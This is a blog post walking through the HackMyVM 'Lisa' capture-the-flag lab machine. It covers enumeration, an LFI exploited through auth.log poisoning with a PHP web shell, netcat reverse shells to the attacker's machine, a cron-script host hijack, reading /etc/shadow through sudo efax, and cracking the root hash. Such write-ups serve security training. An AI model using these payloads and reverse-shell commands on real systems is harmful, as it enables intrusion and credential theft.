Windy's little blog

一切生活中的杂七杂八, and I like CTF.

HackMyVm Lisa Walkthrough

HackMyVm Lisa Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Lisa

Scan ports.

 nmap -sV -sC -p- -oN ports.log 192.168.56.100
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 17:f7:58:02:e9:00:69:04:c5:88:ba:65:5a:11:dc:58 (RSA)
 |   256 4c:32:c5:92:8c:d9:06:a4:a9:89:fa:99:92:bb:66:7f (ECDSA)
 |_  256 d1:36:d3:da:2b:7f:d7:03:5f:fc:1b:94:aa:7e:04:af (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


Scan port 80, found nothing useful. Check index.html, notice the hint about domain name vinci.hmv.

 ~ curl http://192.168.56.100/index.html |tail -n 15                                   
           <p>
                 Please report bugs specific to modules (such as PHP and others)
                 to respective packages, not to the web server itself. contact: vinci.hmv
           </p>
         </div>


Add vinci.hmv to /etc/hosts, scan port 80 again, still found nothing useful.

Use gobuster to enum vhosts.

 ~ gobuster vhost -u vinci.hmv  -w  /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -v |grep -v 10719
 ===============================================================
 ...
 Missed: secret.vinci.hmv (Status: 200) [Size: 80]
 ===============================================================
 2021/07/04 15:35:24 Finished
 ===============================================================


Add secret.vinci.hmv to /etc/hosts, scan files again, found file.php.

 ~ gobuster dir -u http://secret.vinci.hmv -t 50  -w /usr/share/dirbuster/wordlists/directory-list-2.3-medi
 um.txt  -x .html,.php,.txt,.zip,.bak,.php.bak -b 401,403,404,500 --wildcard   -o 80_secret.log
 ===============================================================
 /index.html           (Status: 200) [Size: 80]
 /file.php             (Status: 200) [Size: 0]


Wfuzz to get the param name.

 ~ wfuzz -u 'http://secret.vinci.hmv/file.php?FUZZ=/etc/passwd' -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000004959:   200        26 L     42 W       1441 Ch     "command"  


Looks like a LFI.

 ~ curl 'http://secret.vinci.hmv/file.php?command=/etc/passwd'                        fish-0 | 0 [15:55:59]
 root:x:0:0:root:/root:/bin/bash
 ...
 leonardo:x:1000:1000:leonardo,,,:/home/leonardo:/bin/bash
 ...


See what files we can read.

 ~ wfuzz -u 'http://secret.vinci.hmv/file.php?command=FUZZ' -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt --hh 0         
 ********************************************************
 * Wfuzz 3.1.0 - The Web Fuzzer                         *
 ********************************************************      
 ...
 000000188:   200        0 L      1 W        32032 Ch    "/var/log/faillog"
 000000173:   200        1364 L   16410 W    130186 Ch   "/var/log/auth.log"
 000000181:   200        2993 L   17879 W    202004 Ch   "/var/log/dpkg.log"
 000000220:   200        5 L      85 W       74873 Ch    "/var/log/wtmp"
 000000224:   200        0 L      1 W        1152 Ch     "/var/run/utmp"
 000000199:   200        0 L      1 W        292292 Ch   "/var/log/lastlog"


Because auth.log will save the username of ssh login. So we use a shell code as the ssh name.

 ~ ssh '<?php system($_GET[c]);?>'@192.168.56.100    
 <?php system($_GET[c]);?>@192.168.56.100's password:
 Permission denied, please try again.                


Now we can run bash command.

 ~ curl 'http://secret.vinci.hmv/file.php?command=/var/log/auth.log&c=id'
 ...
 Jun 20 21:55:28 Lisa sshd[7932]: Failed password for invalid user uid=33(www-data) gid=33(www-data) groups
 =33(www-data)
  from 192.168.56.150 port 33632 ssh2
 ...


Get reverse shell.

 ~ curl 'http://secret.vinci.hmv/file.php?command=/var/log/auth.log&c=nc%20192.168.56.150%201234%20-e%20/bi
 n/bash'
 =====================================================================
 ~ nc -nlvp 1234                                        
 Ncat: Version 7.91 ( https://nmap.org/ncat )          
 Ncat: Listening on :::1234                            
 Ncat: Listening on 0.0.0.0:1234                        
 Ncat: Connection from 192.168.56.100.                  
 Ncat: Connection from 192.168.56.100:52344.            
 id                                                    
 uid=33(www-data) gid=33(www-data) groups=33(www-data)  
 


There is only one user leonardo, and /opt/cron.sh belongs to him.

 www-data@Lisa:/home/leonardo$ find / -user leonardo 2>/dev/null
 find / -user leonardo 2>/dev/null                              
 /home/leonardo                                                
 /home/leonardo/.bash_logout                                    
 /home/leonardo/.profile                                        
 /home/leonardo/.bashrc                                        
 /home/leonardo/.local                                          
 /home/leonardo/.local/share                                    
 /home/leonardo/.selected_editor                                
 /home/leonardo/user.txt                                        
 /opt/cron.sh                                                  


Check the source code of cron.sh.

 www-data@Lisa:/opt$ cat cron.sh                               
 cat cron.sh                                                  
 #!/bin/bash                                                  
                                                               
 domain='shelly.lisa.hmv'                                      
                                                               
 function check(){                                            
                                                               
         timeout 1 bash -c "ping -c 1 $domain" > /dev/null 2>&1
     if [ "$(echo $?)" == "0" ]; then
         nohup nc -e /bin/sh $domain 65000
         exit 0
     elseifconfig
         exit 1
     fi                                                        
 }


Add the ip of attacker's machine to /etc/hosts.

 www-data@Lisa:/opt$ ls -la /etc/hosts             
 ls -la /etc/hosts                                
 -rw----rw- 1 root root 457 Jun 14 17:55 /etc/hosts
 www-data@Lisa:/opt$ echo '192.168.56.150 shelly.lisa.hmv' > /etc/hosts
 


Wait a minute, we get reverse shell of user leonardo.

 ~ nc -nlvp 65000                                                                   curl-0 | 130 [16:15:34]
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::65000
 Ncat: Listening on 0.0.0.0:65000
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:49036.
 id
 uid=1000(leonardo) gid=1000(leonardo) grupos=1000(leonardo),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)


Upload id_rsa.pub to /home/leonardo/.ssh/authorized_keys and chmod 600. Then we get ssh access.

 ~ ssh leonardo@192.168.56.100                                                      fish-0 | 130 [16:20:35]
 Enter passphrase for key '/home/kali/.ssh/id_rsa':
 Linux Lisa 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
 
 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.
 
 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Mon Jun 14 13:01:44 2021 from 192.168.1.83
 /usr/bin/xauth:  file /home/leonardo/.Xauthority does not exist
 leonardo@Lisa:~$
 


Check sudo -l.

 leonardo@Lisa:~$ sudo -l
 sudo: unable to resolve host Lisa: Fallo temporal en la resolución del nombre
 Matching Defaults entries for leonardo on Lisa:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User leonardo may run the following commands on Lisa:
     (root) NOPASSWD: /usr/bin/efax


Use efax to read shadow file.

 leonardo@Lisa:~$ sudo efax -d /etc/shadow
 sudo: unable to resolve host Lisa: Fallo temporal en la resolución del nombre
 efax: Sun Jun 20 23:10:17 2021 efax v 0.9a-001114 Copyright 1999 Ed Casas
 efax: Sun Jun 20 23:10:17 2021 efax v 0.9a-001114 Copyright 1999 Ed Casas
 efax: 10:17 compiled Dec 15 2016 12:12:26
 efax: 10:17 opened /etc/shadow
 efax: 10:17 Error: tcgetattr on fd=3 failed: Función ioctl no apropiada para el dispositivo
 efax: 10:17 Warning: unexpected response "root:$6$RnHOYwKvoinsNFhF$zdIHAyW0TtHpAfnUc2p2bEPaHTuu/vdRFcTOSzOokSflUo/YoqDU3NzSCtm9VRELG53fGVrfen1PNBKGt6gix0:18792:0:99999:7:::"
 efax: 10:17 Warning: unexpected response "daemon:*:18791:0:99999:7:::"
 efax: 10:17 Warning: unexpected response "bin:*:18791:0:99999:7:::"
 ...


Use john to crack the password hash of root.

 ~ john --wordlist=/usr/share/wordlists/rock_ascii.txt  hash.txt   
 Using default input encoding: UTF-8
 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
 Cost 1 (iteration count) is 5000 for all loaded hashes
 Will run 2 OpenMP threads
 Press 'q' or Ctrl-C to abort, almost any other key for status
 iloveme          (root)
 1g 0:00:00:00 DONE (2021-07-05 10:28) 6.666g/s 1706p/s 1706c/s 1706C/s 123456..freedom
 Use the "--show" option to display all of the cracked passwords reliably
 Session completed


Get root at last.

 leonardo@Lisa:~$ su root
 Contraseña:
 root@Lisa:~# id;hostname
 uid=0(root) gid=0(root) grupos=0(root)
 Lisa


发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-BlogPHP 1.7.1